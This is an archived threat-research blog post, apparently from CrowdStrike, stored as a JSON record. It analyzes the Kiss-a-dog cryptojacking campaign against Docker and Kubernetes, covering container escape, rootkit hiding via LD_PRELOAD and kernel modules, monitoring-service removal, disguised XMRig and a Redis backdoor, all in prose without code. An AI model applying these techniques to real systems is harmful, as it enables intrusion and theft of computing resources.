{ "id": "587b3309-f07f-48b7-a494-248da681d37a", "created_at": "2026-04-06T00:09:08.997257Z", "updated_at": "2026-04-10T03:33:16.372972Z", "deleted_at": null, "sha1_hash": "b8de0e4d474e76c982a415968858fca44f1e540b", "title": "New Kiss-a-dog Cryptojacking Campaign Targets Docker and Kubernetes", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 5281668, "plain_text": "New Kiss-a-dog Cryptojacking Campaign Targets Docker and\r\nKubernetes\r\nBy Manoj Ahuje\r\nArchived: 2026-04-05 16:31:48 UTC\r\nCrowdStrike has uncovered a new cryptojacking campaign targeting vulnerable Docker and Kubernetes\r\ninfrastructure using an obscure domain from the payload, container escape attempt and anonymized “dog”\r\nmining pools.\r\nCalled “Kiss-a-dog,” the campaign used multiple command-and-control (C2) servers to launch attacks that\r\nattempted to mine cryptocurrency, utilize user and kernel mode rootkits to hide the activity, backdoor\r\ncompromised containers, move laterally in the network and gain persistence.\r\nThe CrowdStrike Falcon® platform helps protect organizations of all sizes from sophisticated breaches,\r\nincluding cryptojacking campaigns such as this.\r\nCrowdStrike has identified a new cryptojacking campaign targeting vulnerable Docker and Kubernetes\r\ninfrastructure. Called “Kiss-a-dog,” the campaign targets Docker and Kubernetes infrastructure using an obscure\r\ndomain from the payload, container escape attempt and anonymized “dog” mining pools.\r\nCrowdStrike’s Cloud Threat Research team deploys and analyzes honeypots to understand how attackers target\r\nvulnerabilities and put cloud infrastructure at risk. CrowdStrike has previously uncovered campaigns targeting\r\nvulnerable cloud infrastructure by cryptojacking botnets/groups like LemonDuck and Watchdog. Kiss-a-dog relies\r\non tools and techniques previously associated with cryptojacking groups like TeamTNT, which targeted vulnerable\r\nDocker and Kubernetes infrastructure. The CrowdStrike Falcon platform protects customers and comprehensively\r\nsecures cloud environments against cryptojacking campaigns like Kiss-a-dog by delivering a powerful\r\ncombination of agentless capabilities to protect against misconfigurations and control plane attacks and agent-based capabilities to protect cloud workloads with runtime security. The CrowdStrike Falcon platform sets the\r\nnew standard in cloud security. Watch this demo to see the Falcon platform in action.\r\nCrowdStrike Detection and Protection\r\nThe Falcon platform unifies cloud security in a single platform to deliver comprehensive protection to its\r\ncustomers from any attacks on Docker and Kubernetes infrastructure. With the Falcon platform, customers can\r\nhttps://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/\r\nPage 1 of 12\n\nimplement “shift-left” strategies to identify vulnerabilities and misconfigurations at development stage to secure\r\nKubernetes and Docker deployments out-of-the-box, while also monitoring production environments for any\r\nsuspicious activity to stop campaigns like Kiss-a-dog. The suspicious activity by the Kiss-a-dog campaign is\r\ndetected by CrowdStrike’s advanced machine learning and multiple behavior-based indicator of attacks (IOAs) in\r\nthe killchain of the campaign. The Falcon platform takes a defense-in-depth approach to protecting customers by\r\nleveraging incoming telemetry to power detection and provide real-time mitigation. It includes the following,\r\nwhich is used to detect a campaign like Kiss-a-dog:\r\n1. Host path mount to escape the container\r\n2. Rogue container running on your Docker instance\r\n3. Misconfigured Kubernetes or Docker instance\r\nFigures 1.A and 1.B show High Confidence detection of a malicious service to run , which is disguised xmrig.\r\nFigure 1.A\r\nFigure 1.B\r\nhttps://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/\r\nPage 2 of 12\n\nFigures 1.A and 1.B. Disguised miner process identified and killed by the Falcon platform\r\nMoreover, the Falcon platform analyzes suspicious images and detects runtime malicious activity, network\r\nconnections along with vulnerability analysis of the image to provide in-depth reports, as shown in Figure 2.\r\nFigure 2. Falcon Dynamic Container Analysis report\r\nSee for yourself how the industry-leading CrowdStrike Falcon platform protects your cloud environments.\r\nStart your 15-day free trial today. In mid-2022, a crypto crash caused havoc in the digital currency market\r\nwhere several currencies — including Bitcoin — dropped 40% to 90% and some of them perished. During this\r\nperiod, cryptomining activity targeting digital currencies on containerized environments remained muffled until\r\nnow. In September 2022, one of CrowdStrike’s honeypots spotted a number of campaigns enumerating vulnerable\r\ncontainer attack surfaces like Docker and Kubernetes. As CrowdStrike monitors exposed Docker APIs, the\r\nfollowing compromised Docker container triggered additional investigation. Figure 3 shows the entry point used\r\nto trigger the initial payload. The Base64-encoded payload is a Python command that downloads a malicious\r\npayload t.sh from the domain kiss\u003c.\u003ea-dog\u003c.\u003etop — hence the Kiss-a-dog campaign name. The entry point\r\nverifies and installs cURL using a package manager and adds a malicious payload as a cron job. Let’s take a closer\r\nlook at this payload and subsequent campaign.\r\nFigure 3. Kiss-a-dog entry point\r\nUse of Obscured Domain\r\nhttps://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/\r\nPage 3 of 12\n\nThe entry point payload used in the initial Docker compromise is a Python code under the wrap, as shown in\r\nFigure 4 after Base64 decode. The URL used in the payload is obscured with backslashes to defeat automated\r\ndecoding and regex matching to retrieve the malicious domain. The Python urllib2 library sanitizes the back\r\nslashes as part of its validation to form a valid domain name kiss\u003c.\u003ea-dog\u003c.\u003etop before querying a DNS\r\n(Domain Name System) server. Attackers used it to their advantage — Figure 5 shows a successful DNS query\r\nafter parsing an actual domain name. With successful name resolution, attackers download the first payload t.sh\r\nfrom a C2 server, which is saved and executed as .1 .\r\nFigure 4. Decoded Kiss-a-dog entry point\r\nFigure 5. Successful DNS query\r\nContainer Escape\r\nContainer escape is the essential part of utilizing the resources on the host and moving laterally into the\r\ncompromised network. The Kiss-a-dog campaign uses a host mount to escape from the container. The technique\r\nitself is not new and seems to be common among cryptominers as an attempt to break out of containers. This is\r\nattributed to a lack of innovation by attackers and at the same time speaks to the vast and easy Docker attack\r\nsurface exposed and available on the internet. Per Shodan, there are 10,000+ Docker instances exposed to the\r\ninternet, as shown in Figure 6.\r\nhttps://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/\r\nPage 4 of 12\n\nFigure 6.A Docker instances exposed to internet (per Shodan)\r\nhttps://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/\r\nPage 5 of 12\n\nFigure 6.B Kubernetes instances exposed to internet (per Shodan)\r\nRemoval of Cloud Monitoring Service\r\nAgent-based cloud monitoring services still remain an easy target for cryptominers, as they can be removed from\r\ncloud instances. After a container escape with root privileges, it is an easy step for an attacker to determine if an\r\ninstance has a cloud monitoring service installed, and if so, then attackers move on to stopping and uninstalling\r\nthe cloud monitoring service. The Kiss-a-dog campaign reused the following code to remove the service (shown\r\nin Figure 7). The code is traced to multiple public GitHub repositories.\r\nhttps://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/\r\nPage 6 of 12\n\nFigure 7. Uninstall aegis service\r\nKernel Headers and GCC\r\nDownloading the pre-compiled binary tools can cause compatibility issues with compromised container’s\r\narchitecture and flavor. To avoid that, the Kiss-a-dog campaign prefers to compile code on compromised\r\ncontainers for multiple tools required in the next stages of the campaign. The attacker installed a relevant kernel\r\nheader and GCC to compile container Linux architecture and flavor-specific binaries to use on the same container.\r\nUse of Traditional Kernel Rootkits Diamorphine and Libprocesshider\r\nThe Kiss-a-dog campaign uses the Diamorphine and libprocesshide rootkits to hide the process from the user\r\nspace, where the typical cloud practitioner will look for malicious activities. Both rootkits are known to hide\r\nprocesses from the user. To avoid detection on the network, the Kiss-a-dog campaign chose to encode the C/C++\r\ncode files and embed as a Base64 string into the script, as shown in Figure 8. At runtime, attackers decoded the\r\nBase64 string as .tar file, which contains code for the Diamorphine rootkit. It is then compiled using GCC to\r\ncreate the file diamorphin.ko , which is loaded as a kernel module using the insmod command.\r\nhttps://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/\r\nPage 7 of 12\n\nFigure 8. Diamorphine rootkit compiled and loaded into the kernel\r\nAttackers used a similar technique to compile the libprocesshider rootkit as a shared library. The difference is that\r\nthe shared library path is set as LD_PRELOAD. This allows the attackers to inject malicious shared libraries into\r\nevery process spawned on a compromised container.\r\nUse of Dog Pools and Disguised Xmrig\r\nThe motive behind the Kiss-a-dog campaign is to run a cryptominer to mine a digital currency. Attackers are using\r\nXMRig, a popular mining software, to mine the cryptocurrency. Cryptojacking groups don’t like to advertise their\r\nwallet addresses because in the past, researchers have found their earnings per day and per campaign by tracking\r\nwallet transactions. Instead, attackers hide wallet addresses by creating anonymous pool servers where mining\r\npeers — like your compromised container — contribute compute efforts anonymously. Interestingly, attackers\r\nused love\u003c.\u003ea-dog\u003c.\u003etop and touch\u003c.\u003ea-dog\u003c.\u003etop as pool servers to hide the Kiss-a-dog campaign’s wallet\r\naddresses. Figure 9.A shows the pool used in the configuration of XMRig. The campaign also disguises XMRig as\r\nand installs a service to run the binary as cmake.service , as shown in Figure 9.B.\r\nhttps://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/\r\nPage 8 of 12\n\nFigure 9.A. Pool configuration for the Kiss-a-dog campaign\r\nFigure 9.B Disguised XMRig as\r\nUse of Pnscan, Zgrab and Masscan\r\nApart from cryptojacking, the secondary goal of the campaign is to reach out to as many vulnerable instances of\r\nRedis and Docker as possible. To achieve this goal, attackers download and compile network-scanning tools like\r\npnscan, masscan and zgrab on the compromised container. These tools then randomly scan the IP ranges on the\r\ninternet to look for vulnerable instances of Docker and Redis servers. Figure 10 shows all of the tools in action.\r\nhttps://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/\r\nPage 9 of 12\n\nFigure 10. Masscan, zgrab and pnscan in action\r\nRedis as a Backdoor\r\nThe Kiss-a-dog campaign installs a Redis server in the background and listens on port 6379 for any incoming\r\nconnection. The Redis server is mostly used to backdoor the container where cron jobs are set to run additional\r\nscripts for mining and pivoting, as shown in Figure 11.\r\n Figure\r\n11. Redis server installed on a container\r\nMultiple Campaigns\r\nThe CrowdStrike Cloud Threat Research team detected multiple campaigns targeting Docker from the same C2\r\nservers previously used by TeamTNT. Table 1 shows some of the malicious payloads used in different campaigns\r\nstarted by TeamTNT. According to our research, the tactics, techniques and procedures of the attack are very\r\nsimilar in all of the campaigns.\r\nhttps://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/\r\nPage 10 of 12\n\nTable 1. Campaign payloads by TeamTNT\r\nConclusion\r\nCryptojacking groups are opportunistically targeting vulnerable Docker and Kubernetes environments to mine\r\ncryptocurrency. The campaigns by cryptojacking groups last from days to months depending on the success rate.\r\nAs cryptocurrency prices have dropped, these campaigns have been muffled in the past couple of months until\r\nmultiple campaigns were launched in October to take advantage of a low competitive environment. Cloud security\r\npractitioners need to be aware of such campaigns and make sure that their cloud infrastructure doesn’t fall prey.\r\nSecuring containers doesn’t need to be an overly complex task. The Falcon platform provides a unified approach\r\nto cloud security, delivering a powerful combination of agentless capabilities to identify security issues in your\r\nenvironment in real time and agent-based capabilities to protect workloads and secure your cloud environments\r\nwith runtime security. CrowdStrike strives to enable organizations to stay ahead of the curve and remain fully\r\nprotected from adversaries and breaches.\r\nAdditional Resources\r\nLearn how you can stop cloud breaches with CrowdStrike unified cloud security for multi-cloud and hybrid\r\nenvironments — all in one lightweight platform.\r\nBuild, run and secure cloud-native applications with speed and confidence using Falcon Cloud Security.\r\nTo learn more about the cloud threat landscape, download “Protectors of the Cloud: Combating the Rise\r\nin Threats to Cloud Environments.”\r\nhttps://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/\r\nPage 11 of 12\n\nVisit the Falcon Cloud Security CWP capabilities page to see if a managed detection and response solution\r\nfor cloud workloads is right for your organization.\r\nLearn how the powerful CrowdStrike Falcon® platform provides comprehensive protection across your\r\norganization, workers and data, wherever they are located.\r\nGet a full-featured free trial of CrowdStrike Falcon Prevent™ and see for yourself how true next-gen AV\r\nperforms against today’s most sophisticated threats.\r\nSource: https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/\r\nhttps://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/\r\nPage 12 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/" ], "report_names": [ "new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes" ], "threat_actors": [ { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "f809bfcb-b200-4988-80a8-be78ef6a52ef", "created_at": "2023-01-06T13:46:39.186988Z", "updated_at": "2026-04-10T02:00:03.240002Z", "deleted_at": null, "main_name": "TeamTNT", "aliases": [ "Adept Libra" ], "source_name": "MISPGALAXY:TeamTNT", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "c3ca592f-0669-49bd-ab5c-310007ab2fb4", "created_at": "2022-10-25T15:50:23.334495Z", "updated_at": "2026-04-10T02:00:05.264841Z", "deleted_at": null, "main_name": "TeamTNT", "aliases": [ "TeamTNT" ], "source_name": "MITRE:TeamTNT", "tools": [ "Peirates", "MimiPenguin", "LaZagne", "Hildegard" ], "source_id": "MITRE", "reports": null }, { "id": "f9806b99-e392-46f1-9c13-885e376b239f", "created_at": "2023-01-06T13:46:39.431871Z", "updated_at": "2026-04-10T02:00:03.325163Z", "deleted_at": null, "main_name": "Watchdog", "aliases": [ "Thief Libra" ], "source_name": "MISPGALAXY:Watchdog", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f012ad04-efca-4598-96a4-61487e1a4f9c", "created_at": "2023-11-08T02:00:07.160467Z", "updated_at": "2026-04-10T02:00:03.430352Z", "deleted_at": null, "main_name": "Kiss-a-Dog", "aliases": [], "source_name": "MISPGALAXY:Kiss-a-Dog", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434148, "ts_updated_at": 1775791996, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/b8de0e4d474e76c982a415968858fca44f1e540b.pdf", "text": "https://archive.orkl.eu/b8de0e4d474e76c982a415968858fca44f1e540b.txt", "img": "https://archive.orkl.eu/b8de0e4d474e76c982a415968858fca44f1e540b.jpg" } }